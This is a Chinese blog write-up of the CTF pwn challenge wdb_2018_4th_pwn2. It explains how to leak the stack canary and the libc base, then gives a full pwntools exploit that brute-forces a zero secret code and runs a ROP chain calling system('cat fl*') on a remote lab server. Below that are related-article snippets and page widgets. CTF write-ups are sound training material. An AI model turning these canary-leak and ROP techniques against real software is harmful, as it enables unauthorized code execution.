wdb_2018_4th_pwn2(爆破随机数为0)

最新推荐文章于 2024-01-14 23:59:26 发布
最新推荐文章于 2024-01-14 23:59:26 发布
阅读量685 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: PWN 安全 CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107567195
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

wdb_2018_4th_pwn2(爆破随机数为0)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,功能1栈溢出,但是有canary

功能3格式化字符串,当仅能泄露一个值。

功能2是一个递归调用,多次递归,可以在栈里多处位置留下canary的值

功能9011也是一个栈溢出,但是需要正确的key才能进行。

可以使用功能3泄露libc地址,然后功能2递归多次,再使用功能1将canary的值泄露,最后通过爆破随机数,用9011功能来进行栈溢出做ROP。

随机数可以直接用0来爆破,因为/dev/urandom随机数也可能产生0,并且爆破失败程序可以继续,而不是崩溃。

#coding:utf8
from pwn import *

#sh = process('./wdb_2018_4th_pwn2',env={'LD_PRELOAD':'./libc-2.23.so'})
context.log_level = 'debug'
sh = remote('node3.buuoj.cn',25936)
libc = ELF('./libc-2.23.so')


def stack(payload):
   sh.sendlineafter('option:','1')
   sh.sendafter('once..',payload)

def bored(payload,n):
   sh.sendlineafter('option:','2')
   for i in range(n-1):
      sh.sendafter('bored...','a')
      sh.sendlineafter('Satisfied?y/n','n')
   sh.sendafter('bored...',payload)
   sh.sendlineafter('Satisfied?y/n','y')

def printf(payload):
   sh.sendlineafter('option:','3')
   sh.sendafter('think?)',payload)


def secret(code):
   sh.sendlineafter('option:','9011')
   sh.sendafter('code:',code)

bored('a',5)
stack('a'*0xA9)
sh.recvuntil('a'*0xA9)
canary = u64(sh.recv(7).rjust(8,'\x00'))
print 'canary=',hex(canary)
printf('%a')
sh.recvuntil('0x0.0')
libc_base = int(sh.recvuntil('p-',drop = True),16) - libc.sym['_IO_2_1_stdout_'] - 0x83
system_addr = libc_base + libc.sym['system']
pop_rdi = libc_base + 0x0000000000021102
pop_rsi = libc_base + 0x00000000000202e8
#mov qword ptr [rsi], rdi ; ret
mov_q_rsi_rdi = libc_base + 0x0000000000123052
bss = libc_base + libc.bss()
print 'libc_base=',hex(libc_base)
payload = 'a'*0x8 + p64(canary) + p64(0) + p64(pop_rdi) + 'cat fl*\x00' + p64(pop_rsi) + p64(bss) + p64(mov_q_rsi_rdi)
payload += p64(pop_rdi) + p64(bss) + p64(system_addr)
payload = payload.ljust(0x1000,'\x00')
bored(payload,1)

#爆破随机数为0
try:
   for i in range(9999):
      secret('\x00'*0x8)
except:
   sh.close()

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 434
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
dictionary:来自pwn硬糖师傅的爆破字典
05-20
dictionary 来自pwn硬糖师傅的爆破字典 ---非最终版
[BUUCTF-pwn] wdb_2018_4th_pwn2
weixin_52640415的博客
11-21 239
printf('%a') 程序有4个函数: 在栈内写,可溢出,但由于有canary不通直接写ROP,且只能运行1次 在bss写,可以递归式调用 可以运行printf(input ,1) 这里input只能2字节 把门把bss写入栈内溢出,但要求输入与随机数相等,,并且关闭输入,无法交互 要点: printf('%a',1)浮点格式可以带出libc 8位随机数,会有0的时候,而且从事实上看1000次以内就能成功 步骤: 先调用2多次,因为递归调用会在栈内多次布放canary,这些失效的c...
[BUUCTF-pwn] wdb_2018_semifinal_pwn2
weixin_52640415的博客
01-07 159
又是一个虚拟机的题,干到一半想放弃了,搜不到wp又回来慢慢作。 先看题目: for ( byte_6024C1 = 0; ; ++byte_6024C1 ) { byte_6028E1 = byte_6024E0[byte_6024C1]; if ( !byte_6028E1 ) break; byte_6028E0 = 0; if ( byte_6028E1 == 62 ) // > 先后移指针
CTF随机数爆破
最新发布
csjjjd的博客
01-14 750
借用在rand()函数中,我们可以通过设置随机数种子来影响随机数的生成。例如,在rand()函数中加入了随机数种子编码后,每次运行程序将会生成同样的随机整数序列。这个就是伪随机数,因为种子是已知的。这道题实际上是一个伪随机数,因为在随机数生成中,种子值是一个起始点,它用于初始化随机数生成器。如果使用相同的种子值,随机数生成器将生成相同的随机数序列。通过srand()函数设置随机数种子后,程序将会生成一个包含5个整数的随机数序列。这就是随机数种子的作用。要了解伪随机数爆破首先你的先知道什么是PHP种子,
PWN-爆破Canary
weixin_53394081的博客
04-23 870
爆破Canary
WDB.zip_vxworks WDB组件_vxworks wdb_wdb
09-22
WDB,全称为Wind River Debug Bridge,是VxWorks系统中一个重要的组件,它提供了强大的远程调试功能,允许开发者在主机上对目标系统的VxWorks应用进行调试。 VxWorks WDB组件的核心功能包括: 1. **远程调试**:...
wdb_graphql
03-15
迷你挑战3-WDB @ FHNE BSc数据科学 作者:卢卡斯·雷伯(Lukas Reber) 使用Django和Graphene构建的GraphQL API。 Selenium Web Scraping脚本(在找到)使用该API来存储和更新数据库中的数据。 由于这只是概念的...
KEY2_TEST.zip_altera_cyclone iV_firmware_quartus
09-21
【标题】"KEY2_TEST.zip_altera_cyclone_iV_firmware_quartus" 提供的是Altera公司的Cyclone IV系列 FPGA(Field-Programmable Gate Array)的固件示例,这些示例主要用于展示如何在Quartus II软件环境中进行固件...
LED.zip_14489端口_STVD_Stvd led 例程_stm8s stvd
09-23
9. `LED.wdb`:这可能是STVD的工作数据库文件,用于保存开发过程中的信息,如断点、变量监视等。 总结来说,这个项目涉及的知识点主要包括: 1. STM8S微控制器的架构和特性。 2. STVD开发环境的使用,包括代码编辑...
CTF--伪随机数爆破
weixin_44711063的博客
03-30 2669
CTF–伪随机数爆破 题目:一个由纯汇编编写的CrackMe,要求输入正确密码,不能直接爆破 .题目分析: 1、先托到PE文件查看工具里看看,发现这软件有TLS表,几乎就可以直接判断它带有了反调试,具体是怎样反调试还得详细查看 2、将程序先丢进OD,没有断下,很正常。因为有反调试嘛 3、于是我们设置在TLS下断 ( 需要OD有这个插件 )或者直接查看TLS表中AddressOfCallBacks来得到第一个callback函数的地址,这里是0x402000 4、直接在0x402000这里下断,重新运
pwn中 one-by-one 爆破 Canary
Jonas_brown的博客
10-28 455
对于 Canary,虽然每次进程重启后的 Canary 不同 (相比 GS,GS 重启后是相同的),但是同一个进程中的不同线程的 Canary 是相同的, 并且 通过 fork 函数创建的子进程的 Canary 也是相同的,因为 fork 函数会直接拷贝父进程的内存。我们可以利用这样的特点,彻底逐个字节将 Canary 爆破出来。 在著名的 offset2libc 绕过 linux64bit 的所有保护的文章中,作者就是利用这样的方式爆破得到的 Canary: 这是爆破的 Python 代码:
CTFshow web入门——爆破
小元砸的博客
01-24 4928
web 21 一.涉及工具: burp suit burp suit 使用教程 二.解题思路: 1.随便输一个密码和用户名抓包一下 2.base64解密一下发现账号密码的形式为 账号:密码,根据题目提示我们用自定义迭代器爆破,使用方法参考:Custom iterator的使用 注:下面爆破用的字典是题目所提供的 3.爆破出结果 web 22 一.涉及知识点: 子域名爆破(此题不能爆破出来)在线子域名爆破 二.解题思路: 直接点开View Hint(提示)即可得到答案 web 23 一.涉及工具: p
CTFshow-web入门-爆破
qq_63575829的博客
04-18 440
CTFshow-web入门-爆破
pwn篇:随机数种子
weixin_44644249的博客
02-02 1093
攻防世界pwn进阶:dice_game 程序分析: 64位elf可执行文件、libc.so.6库文件 保护:除了Canary,其他保护全开 IDA分析程序逻辑 创建一个随机数种子,为当前时间 首先输入名字,长度为55的数组。程序对输入做了处理,当大于49长度时,将最后一个赋值为“0x00”,也就是对字符串长度进行了限制,这个函数没什么问题。 打印输入的字符串,这里也没什么问题。 调用了srand函数,seed是输入名字时字符串第0x41个元素,也就是该值可控。 SUB_A20函数对随机数进行了处理,
【八芒星计划】pwn python PIE爆破脚本绕过ASLR 覆盖后几位
carol2358的博客
09-02 3545
from pwn import * from LibcSearcher import * import time local_file = './magic_number' local_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so' remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so' select = 0 if select == 0: r = pro
wdb_2018_2nd_easyfmt
weixin_43904731的博客
12-14 487
wdb_2018_2nd_easyfmt(格式化字符串)
Ctfer训练计划】——(六)
热门推荐
Demo不是emo的博客
12-29 1万+
ctfer养成计划
[BUUCTF]REVERSE——wdb_2018_2nd_easyfmt(32位格式化字符串修改got表)
mcmuyanga的博客
03-08 903
wdb_2018_2nd_easyfmt 附件 步骤 例行检查,32位程序,开启了nx 本地试运行一下,看看大概的情况,看交互式的情况,知道存在格式化字符串漏洞 32位ida载入 利用思路: 找到格式化字符的偏移量 打印print@got的地址,泄露libc,计算system的地址 将print@got修改成system,传入参数‘/bin/bash\x00’ 利用过程: 找到偏移为6 打印print@got的地址 printf_got=elf.got["printf"] payloa
怎么把vivao2018.2波形生成的WDB文件导出来
03-29
要将Vivado 2018.2波形生成的WDB文件导出,请按照以下步骤进行操作: 1. 在Vivado中打开波形文件。 2. 点击“File”菜单并选择“Write Waveform Data”。 3. 在弹出的“Write Waveform Data File”对话框中,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值